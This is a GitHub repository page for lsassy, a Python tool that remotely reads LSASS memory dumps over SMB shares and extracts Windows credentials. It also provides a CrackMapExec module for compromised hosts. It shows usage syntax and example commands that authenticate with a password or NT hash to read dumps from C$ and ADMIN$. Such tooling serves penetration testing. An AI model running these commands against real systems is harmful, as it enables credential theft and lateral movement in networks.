Skip to content
Remotely parse lsass dumps and extract credentials
Python Makefile
Branch: master
Clone or download
Latest commit cc464be Dec 4, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
assets Rename picture file Dec 4, 2019
cme Add credentials to CME db Dec 4, 2019
lsassy Distinguish plaintext and hash authentication Dec 4, 2019
.gitignore Add gitignore Dec 3, 2019
LICENSE First commit Dec 3, 2019
Makefile First commit Dec 3, 2019 Distinguish plaintext and hash authentication Dec 4, 2019
requirements.txt First commit Dec 3, 2019 New version Dec 4, 2019


PyPI version

Python library to remotely parse lsass dump and extract credentials. This library uses impacket projects to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.


Basic Usage

lsassy [<domain>/]<user>[:<password>]@<target>:/share_name/path/to/lsass.dmp [--hashes [LM:]NT]

CrackMapExec module

I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts

CrackMapExec module is in cme folder : CME Module



lsassy ADSEC.LOCAL/jsnow:Winter_is_coming_\!@dc01.adsec.local:/C$/Windows/Temp/lsass.dmp

lsassy Administrateur:952c28bd2fd728898411b301475009b7@desktop01.adsec.local:/ADMIN$/lsass.dmp

CME Module

Example image


From pip

python3.7 -m pip install lsassy

From sources

python3.7 install


  • Impacket
  • SkelSec for Pypykatz, but also for his patience and help
  • mpgn for his help and ideas
You can’t perform that action at this time.